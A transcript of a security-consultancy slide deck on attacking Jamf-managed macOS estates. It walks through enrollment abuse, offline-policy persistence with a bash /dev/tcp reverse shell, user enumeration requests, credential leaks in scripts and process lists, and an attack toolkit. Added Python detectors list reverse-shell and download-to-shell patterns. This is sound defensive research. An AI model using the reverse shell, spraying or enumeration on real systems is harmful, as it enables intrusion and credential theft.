AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS
Transcript of the slide deck "An Attacker's Perspective on Jamf Configurations" by Luke Roberts and Calum Hall (F-Secure Consulting).
[Page 1]
Luke Roberts, Calum Hall
AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS
[Page 2]
HOW WE COMPROMISED YOUR MACOS ESTATE …
[Page 3]
IN 5 MINUTES…
[Page 4]
FROM THE INTERNET!
[Page 5]
WHO ARE WE?
Calum Hall @_calumhall
Luke Roberts @rookuu_
[Page 6]
MACOS ENVIRONMENTS
[Page 7]
SELF MANAGED
§ Common with developers
§ Lack of security controls
§ Difficult to integrate
CUSTOM ENVIRONMENTS
§ Can be tuned to your needs
§ Extensive setup
§ High maintenance
§ Tech companies like Google, Facebook
IT MANAGEMENT SOLUTIONS
§ 3rd party software: Jamf, Parallels
§ Deployment and management
§ Mobile Device Management (MDM)
[Page 8]
“THE STANDARD FOR APPLE IN THE ENTERPRISE”
[Page 9]
1 DEPLOYMENT
2 DEVICE MANAGEMENT
3 APP MANAGEMENT
4 INVENTORY
5 SELF SERVICE
6 SECURITY
[Page 10]
AGENDA
§ JAMF INTERNALS
§ ATTACKING JAMF
§ JAMF ATTACK TOOLKIT
[Page 11]
JAMF INTERNALS
[Page 12]
OVERVIEW OF COMPONENTS
§ Jamf Software Server (JSS): web application that functions as the administrative core of Jamf Pro.
§ Infrastructure Manager: LDAP proxy between an external JSS and an organisation's directory services.
§ Jamf Agent: command-line utility that administrates the managed device.
§ Self Service: macOS application that allows users to browse and install or run configuration profiles, policies and apps.
Source: https://resources.jamf.com/documents/products/documentation/jamf-pro-10.19.0-administrators-guide.pdf
[Page 13]
WHAT ARE WE ATTACKING?
[Page 14]
TRADITIONAL DEPLOYMENT
[Page 15]
CLOUD DEPLOYMENT
[Page 16]
© F-SECURE CONSULTING
ON-PREM VS CLOUD
What if it breaks?
How do I configure it securely?
How much control do I have?
Who is going to ensure it’s patched?
Ease of deployment
Internet facing attack surface
[Page 17]
DEVICE ENROLLMENT
Pre-Stage (DEP)
QuickAdd PKG
PKG
Self-enrollment
Recon
[Page 18]
JAMF AGENT
Enrollment → Periodic Check-in (checks device information) → Execute JSS Instructions (actions to perform on device)
Device information sent at check-in:
```xml
<device>
  <uuid>A6A978CE-D6F0-5EA8-8C70-EB0CE4FC8A8A</uuid>
  ...
</device>
...
<commandData>
  <checkForPolicies>
    <ns2:username>admin</ns2:username>
    <ns2:trigger>CLIENT_CHECKIN</ns2:trigger>
    <ns2:id>0</ns2:id>
    <ns2:processor>x86_64</ns2:processor>
    <ns2:day>Thu</ns2:day>
    <ns2:hour>16</ns2:hour>
    <ns2:minute>44</ns2:minute>
    <ns2:reportedIP>10.12.254.55</ns2:reportedIP>
  </checkForPolicies>
</commandData>
</content>
</ns2:jamfMessage>
```
[Page 19]
JAMF AGENT
JSS instructions returned to the agent:
```xml
<ns2:jamfMessage>
  <ns2:policies>
    <ns2:policy>
      <ns2:id>6</ns2:id>
      <ns2:name>objsee-example</ns2:name>
      <ns2:availableOffline>false</ns2:availableOffline>
      <ns2:scripts>
        <ns2:script>
          <ns2:filename>objsee-script-example</ns2:filename>
          <ns2:contents>
#!/bin/bash
echo "Hello World" > /tmp/obts
          </ns2:contents>
        </ns2:script>
      </ns2:scripts>
    </ns2:policy>
  </ns2:policies>
</ns2:jamfMessage>
```
[Page 20]
CONFIGURING JAMF
§ Configuration Items: uses MDM to push .mobileconfig files
§ Extension Attributes: indiscriminate data retrieval
§ Policies (and Scripts): performs a targeted action on a device
[Page 21]
ADMINISTRATIVE TOOLING
SSH
[Page 22]
ATTACKING JAMF
[Page 23]
KILL CHAIN
Stages: RECON → DELIVERY → EXPLOIT → PERSISTENCE → C2 → INTERNAL RECON → LATERAL MOVEMENT → OBJECTIVE
Techniques covered: Self-enrollment, Offline Policies, SSH Hijacking, Policy Abuse, JSS OSINT, Execution via JSS, Extended Attributes, User Object Enumeration
[Page 24]
Kill chain stage: RECON
[Page 25]
[Page 26]
[Page 27]
[Page 28]
Kill chain stage: DELIVERY
[Page 29]
SELF ENROLLMENT
“… allows users to initiate the enrollment process on their own.”
https://<name>.jamfcloud.com/enroll
[Page 30]
SELF ENROLLMENT
1 https://<name>.jamfcloud.com/enroll
2 John Smith
3 🤔
[Page 31]
SELF ENROLLMENT
HTTP 302 → 200
[Page 32]
SELF ENROLLMENT
???
VPN, Apps, Files
[Page 33]
Kill chain stage: EXPLOIT
[Page 34]
CODE EXECUTION
[Page 35]
[Page 36]
Kill chain stage: PERSISTENCE
[Page 37]
OFFLINE POLICIES
§ Jamf executes these when the JSS is unavailable
§ Execution frequency can be set (startup, period etc.)
§ Requires admin privileges to write
§ No validation of policy contents
```xml
<policies><policy>
  <policyResponseUUID>7dc5db3c-5491-40ee-94d3-00b9f4d0bfbb</policyResponseUUID>
  <id>3</id>
  <name>offline-script-example</name>
  <availableOffline>true</availableOffline>
  ...
  <scripts>
    <script>
      <filename>offline-file-example</filename>
      <osRequirement></osRequirement>
      <priority>After</priority>
      <parameters>
        <parameter></parameter>
        <parameter></parameter>
      </parameters>
      <contents>
#!/bin/bash
/bin/bash >& /dev/tcp/172.16.132.1/8087 0>&1 & disown
      </contents>
    </script>
  </scripts>
  ...
</policy>
```
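The policy returned at check-in and the offline policy above share one shape: policies containing scripts that the jamf agent executes with root privileges, and an offline policy runs even when the JSS cannot be reached, with no validation of its contents. The following Python is an added example (not Jamf's code and not the authors' toolkit) that parses either form, ignoring the ns2 namespace (the slides show the prefix but not its URI, so the URI in the sample is an assumption), and flags scripts carrying reverse-shell or download-and-execute patterns, marking which of them will run offline. The sample message is constructed from the two slide fragments.

```python
"""Parse Jamf policy XML and flag dangerous script contents.

Added example (not Jamf's code, not the talk's toolkit). Handles both the
namespaced check-in response (ns2:jamfMessage) and the un-namespaced offline
policy file shown on the slides; the ns2 namespace URI is an assumption.
"""
import re
import xml.etree.ElementTree as ET

# Constructed sample built from the two slide fragments: one online-only policy
# and one offline policy whose script is a bash reverse shell.
SAMPLE = """<ns2:jamfMessage xmlns:ns2="urn:example:jamf">
  <ns2:policies>
    <ns2:policy>
      <ns2:id>6</ns2:id><ns2:name>objsee-example</ns2:name>
      <ns2:availableOffline>false</ns2:availableOffline>
      <ns2:scripts><ns2:script>
        <ns2:filename>objsee-script-example</ns2:filename>
        <ns2:contents>#!/bin/bash
echo "Hello World" > /tmp/obts</ns2:contents>
      </ns2:script></ns2:scripts>
    </ns2:policy>
    <ns2:policy>
      <ns2:id>3</ns2:id><ns2:name>offline-script-example</ns2:name>
      <ns2:availableOffline>true</ns2:availableOffline>
      <ns2:scripts><ns2:script>
        <ns2:filename>offline-file-example</ns2:filename>
        <ns2:priority>After</ns2:priority>
        <ns2:parameters><ns2:parameter></ns2:parameter><ns2:parameter></ns2:parameter></ns2:parameters>
        <ns2:contents>#!/bin/bash
/bin/bash >&amp; /dev/tcp/172.16.132.1/8087 0>&amp;1 &amp; disown</ns2:contents>
      </ns2:script></ns2:scripts>
    </ns2:policy>
  </ns2:policies>
</ns2:jamfMessage>"""

# Patterns a management script should never need; each carries a reason string.
SUSPICIOUS = [
    (re.compile(r"/dev/(tcp|udp)/"), "bash network redirection (reverse shell)"),
    (re.compile(r"\b(nc|ncat|socat)\b"), "netcat/socat"),
    (re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(ba|z)?sh\b"), "download piped to a shell"),
    (re.compile(r"base64\s+(-d|-D|--decode)\b"), "base64-decoded payload"),
]


def _local(tag):
    """'{uri}policy' -> 'policy', so one reader handles both XML flavours."""
    return tag.rsplit("}", 1)[-1]


def _child_text(el, name):
    """Text of the first direct child called `name`, namespace ignored."""
    for child in el:
        if _local(child.tag) == name:
            return (child.text or "").strip()
    return ""


def parse_policies(xml_text):
    """Return [{id, name, offline, scripts: [{filename, contents, parameters}]}]."""
    root = ET.fromstring(xml_text)
    policies = []
    for pol in root.iter():
        if _local(pol.tag) != "policy":
            continue
        scripts = []
        for scr in pol.iter():
            if _local(scr.tag) != "script":
                continue
            scripts.append({
                "filename": _child_text(scr, "filename"),
                "contents": _child_text(scr, "contents"),
                "parameters": [(p.text or "") for p in scr.iter() if _local(p.tag) == "parameter"],
            })
        policies.append({
            "id": _child_text(pol, "id"),
            "name": _child_text(pol, "name"),
            "offline": _child_text(pol, "availableOffline") == "true",
            "scripts": scripts,
        })
    return policies


def audit(xml_text):
    """Flag scripts matching SUSPICIOUS; offline ones run even with the JSS down."""
    findings = []
    for pol in parse_policies(xml_text):
        for scr in pol["scripts"]:
            reasons = [why for rx, why in SUSPICIOUS if rx.search(scr["contents"])]
            if reasons:
                findings.append({
                    "policy": f"{pol['id']}:{pol['name']}",
                    "script": scr["filename"],
                    "offline": pol["offline"],
                    "reasons": reasons,
                })
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE):
        scope = "OFFLINE" if f["offline"] else "online"
        print(f"[{scope}] policy {f['policy']} script {f['script']}: {', '.join(f['reasons'])}")
```

Point `audit` at the agent's offline policy store or at policy XML pulled through the API; the namespace-agnostic lookup is what lets one reader handle both. The patterns are a starting list, not an allow-list: the Hello World script passes, the /dev/tcp reverse shell from the offline-policy slide does not, and the finding records that it is marked availableOffline.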
[Page 38]
Kill chain stage: INTERNAL RECON
[Page 39]
USER OBJECT ENUMERATION
§ Devices can be enrolled with local JSS credentials
§ Assign AD user for inventory purposes
```http
POST /enroll/enroll.ajax HTTP/1.1
Host: jss.f-secure.com:8443
Accept: */*
X-Requested-With: XMLHttpRequest
Cookie: JSESSIONID=abcdef

username=a
```
a
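The user lookup shown above is what makes enumeration possible: the enrollment portal answers a partial username with matching user objects, and the toolkit slide later describes spraying the same portal. On the server side both look like a burst of POSTs to the enrollment paths from one source. The Python below is an added example, not the authors' tooling: it parses common-log-format access lines (assumed to come from a reverse proxy or the web tier in front of the JSS; the sample entries are constructed here) and raises one alert per source IP that posts to /enroll/ or /enroll/enroll.ajax more than a threshold number of times inside a sliding window.

```python
"""Detect enumeration / spraying bursts against the Jamf enrollment portal.

Added example, not the authors' tooling. Reads common-log-format access lines
(assumed to come from a reverse proxy in front of the JSS; the sample below is
constructed) and alerts when one source IP posts to the self-enrollment paths
more than `threshold` times inside a sliding `window_s` window.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Paths from the talk: the portal itself and the user-lookup endpoint it calls.
WATCHED = {"/enroll/", "/enroll/enroll.ajax"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """One CLF line -> dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],   # drop any query string
        "status": int(m["status"]),
    }


def detect_bursts(lines, threshold=10, window_s=60):
    """Sliding-window count of POSTs to WATCHED per source IP.

    Returns one alert per offending IP with the peak in-window count. Lines
    are expected in time order, as a tailed access log delivers them.
    """
    recent = defaultdict(deque)   # ip -> timestamps of watched POSTs in window
    alerts = {}
    for line in lines:
        ev = parse_line(line)
        if not ev or ev["method"] != "POST" or ev["path"] not in WATCHED:
            continue
        q = recent[ev["ip"]]
        q.append(ev["ts"])
        while (ev["ts"] - q[0]) > timedelta(seconds=window_s):
            q.popleft()
        if len(q) >= threshold:
            a = alerts.setdefault(ev["ip"], {"ip": ev["ip"], "first": q[0], "count": 0})
            a["last"] = ev["ts"]
            a["count"] = max(a["count"], len(q))
    return list(alerts.values())


def _clf(ip, ts, method, path, status):
    """Build a constructed common-log-format line."""
    return f'{ip} - - [{ts:%d/%b/%Y:%H:%M:%S %z}] "{method} {path} HTTP/1.1" {status} 512'


# Constructed sample: one legitimate enrollment, then 25 lookups in 25 seconds
# from a single address, which is what user-object enumeration looks like.
_T0 = datetime(2020, 10, 1, 16, 44, tzinfo=timezone.utc)
SAMPLE_LOG = [
    _clf("198.51.100.20", _T0, "GET", "/enroll/", 200),
    _clf("198.51.100.20", _T0 + timedelta(seconds=5), "POST", "/enroll/enroll.ajax", 200),
]
SAMPLE_LOG += [
    _clf("203.0.113.7", _T0 + timedelta(seconds=10 + i), "POST", "/enroll/enroll.ajax?rand=1", 200)
    for i in range(25)
]
SAMPLE_LOG.append(_clf("198.51.100.20", _T0 + timedelta(seconds=40), "POST", "/enroll/", 302))


if __name__ == "__main__":
    for a in detect_bursts(SAMPLE_LOG):
        print(f"{a['ip']}: {a['count']} enrollment POSTs between "
              f"{a['first']:%H:%M:%S} and {a['last']:%H:%M:%S}")
```

Ten lookups a minute is already several times what a person enrolling one machine generates, so the defaults are deliberately loose; tune `threshold` and `window_s` against the portal's real traffic before alerting on it. The alert carries only the source and the counts, which is enough to go back to the web tier for the usernames that were tried.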
[Page 40]
Kill chain stage: LATERAL MOVEMENT
[Page 41]
SHARED MANAGEMENT CREDENTIALS
§ “Account to use for managing computers enrolled by user-initiated enrollment”
§ Used to remotely manage devices
§ Passwords can be randomly generated or set
[Page 42]
SHARED MANAGEMENT CREDENTIALS
§ Jamf Remote uses this account for administration over SSH
§ Alter SSH binary?
§ Rogue PAM modules?
§ Hijack SSH service?
§ Password spray across macOS estate 👌
[Page 43]
POLICY ABUSE
LAPS.sh
[Page 44]
POLICY ABUSE
LAPS.sh
Plaintext credentials in scripts!
[Page 45]
POLICY ABUSE
LAPS.sh
/Library/Application Support/JAMF/tmp
[Page 46]
POLICY ABUSE
LAPS.sh
Script Argument Edition
[Page 47]
POLICY ABUSE
LAPS.sh
Script Argument Edition
ps aux | grep -i jamf | grep -i path
[Page 48]
POLICY ABUSE
2_Security_Audit_Compliance_API.sh
Why not both?
[Page 49]
HOW DEEP DOES THE RABBIT HOLE GO?
SPOILER ALERT: WE'RE STILL FALLING
[Page 50]
Topic of earlier examples
[Page 51]
Jamf Resources: Community Uploaded Files
[Page 52]
[Page 53]
[Page 54]
[Page 55]
Extension Attributes can be misconfigured in the same way!
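The policy-abuse slides show two places credentials leak on the endpoint: hard-coded in the script body that lands in /Library/Application Support/JAMF/tmp while the policy runs, and in script parameters visible to any local user through the process list (the ps one-liner above). The same applies to extension attribute scripts and to scripts copied from community uploads. The Python below is an added example, not the authors' JamfExplorer or JamfDumper: it scans script text for plaintext-credential patterns and pulls script parameters out of ps aux output, redacting what it finds. The LAPS-style script, the ps lines and the exact jamf runScript argument layout (-script, -path, -pN) are constructed for illustration and are not taken from the slides.

```python
"""Hunt for plaintext credentials in Jamf policy scripts and their arguments.

Added example, not the talk's JamfExplorer or JamfDumper. Script bodies come
from wherever you obtained them (a JSS dump, a copy of
/Library/Application Support/JAMF/tmp taken while a policy ran, a community
upload); process lines are `ps aux` output. The script, the ps lines and the
`jamf runScript -script/-path/-pN` argument layout are constructed for
illustration and are not taken from the slides.
"""
import re

TMP_DIR = "/Library/Application Support/JAMF/tmp/"

# Each regex captures the secret in its LAST group. A value beginning with "$"
# is a shell variable, not a literal, so the character classes exclude it.
_VAL = r"['\"]?([^'\"\s$][^'\"\s]*)"
CRED_PATTERNS = [
    (re.compile(r"(?i)(pass(word|wd)?|pwd|secret|token|api[_-]?key)\s*=\s*" + _VAL), "assignment"),
    (re.compile(r"(?i)\bcurl\b[^\n]*?\s-u\s+['\"]?([^'\"\s$]+:[^'\"\s]+)"), "curl basic auth"),
    (re.compile(r"(?i)-adminPassword\s+" + _VAL), "sysadminctl password"),
    (re.compile(r"dscl\s+\S+\s+-passwd\s+\S+\s+" + _VAL), "dscl password"),
]


def redact(secret):
    """Keep two characters so a hit can be traced to its source, hide the rest."""
    return secret[:2] + "***"


def scan_script(text, name="<script>"):
    """Return one finding per line that carries a literal credential."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for rx, kind in CRED_PATTERNS:
            m = rx.search(line)
            if m:
                findings.append({"script": name, "line": lineno, "kind": kind,
                                 "value": redact(m.groups()[-1])})
    return findings


def looks_like_secret(value):
    """Cheap argv heuristic: 8+ chars mixing letters, digits and case/punctuation."""
    return (len(value) >= 8
            and re.search(r"[A-Za-z]", value) is not None
            and re.search(r"\d", value) is not None
            and re.search(r"[A-Z]|[^A-Za-z0-9]", value) is not None)


def jamf_script_invocations(ps_text):
    """Pull policy-script executions out of `ps aux` output.

    Two shapes are recognised: `jamf runScript -script NAME -path DIR -pN VALUE`
    (ps prints DIR unquoted, so its embedded space splits it; only -script and
    -pN values are read) and a direct interpreter run of a script under TMP_DIR.
    """
    found = []
    for line in ps_text.splitlines()[1:]:            # skip the header row
        cols = line.split(None, 10)                  # 11th column is the command line
        if len(cols) < 11:
            continue
        pid, cmd = cols[1], cols[10]
        argv = cmd.split()
        if argv[0].endswith("/jamf") and "runScript" in argv:
            opts = {}
            for i, tok in enumerate(argv[:-1]):
                if tok.startswith("-") and not argv[i + 1].startswith("-"):
                    opts[tok] = argv[i + 1]
            params = [v for k, v in opts.items() if re.fullmatch(r"-p\d+", k)]
            found.append({"pid": pid, "script": opts.get("-script", "?"), "params": params})
        elif TMP_DIR in cmd:
            script, _, tail = cmd.split(TMP_DIR, 1)[1].partition(" ")
            found.append({"pid": pid, "script": script, "params": tail.split()})
    return found


def find_secret_args(ps_text):
    """Script parameters visible to every local user via ps that look like secrets."""
    return [{"pid": inv["pid"], "script": inv["script"], "value": redact(p)}
            for inv in jamf_script_invocations(ps_text)
            for p in inv["params"] if looks_like_secret(p)]


# --- constructed samples ---------------------------------------------------
LAPS_SAMPLE = """#!/bin/bash
# Rotate the local admin password and record it in the JSS (constructed script).
apiUser="jssapi"
apiPass="Sup3rS3cret!"
newPass=$(openssl rand -base64 12)
sysadminctl -adminUser "$4" -adminPassword "$5" -resetPasswordFor "$4" -newPassword "$newPass"
curl -s -u "$apiUser:$apiPass" -X PUT "https://jss.example.com:8443/JSSResource/computers/udid/$udid" -d "<computer/>"
"""

PS_SAMPLE = """USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
root 4123 0.0 0.1 4300000 12000 ?? S 4:44PM 0:00.05 /usr/local/jamf/bin/jamf policy -trigger CLIENT_CHECKIN
root 4131 0.0 0.2 4310000 20000 ?? S 4:44PM 0:00.10 /usr/local/jamf/bin/jamf runScript -script LAPS.sh -path /Library/Application Support/JAMF/tmp -p1 localadmin -p2 Winter2020!
root 4140 0.0 0.0 4200000 8000 ?? S 4:44PM 0:00.01 /bin/bash /Library/Application Support/JAMF/tmp/LAPS.sh / mac-001 jsmith localadmin Winter2020!
"""

if __name__ == "__main__":
    for f in scan_script(LAPS_SAMPLE, "LAPS.sh") + find_secret_args(PS_SAMPLE):
        print(f)
```

The script scanner flags the hard-coded API password but not the `$5` parameter or the `$apiPass` variable, which is the distinction that matters when triaging a dump: a variable reference is only a problem if its value arrives as a policy parameter, and that is exactly what the ps half of the example catches. Run the ps half repeatedly while a policy is executing, because the parameters are only exposed for as long as the script runs.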
[Page 56]
JAMF ATTACK TOOLKIT
[Page 57]
1 JamfSniper: password sprays either the JSS enrolment portal or the API.
2 JamfEnumerator: queries the LDAP user object API to enumerate all user objects in the target's directory service.
3 JamfExplorer: listens for executing policies and extension attributes to obtain insecurely stored credentials.
4 JamfDumper: dumps scripts, policies and extension attributes to disk once JSS API access has been obtained.
[Page 58]
[Page 59]
[Page 60]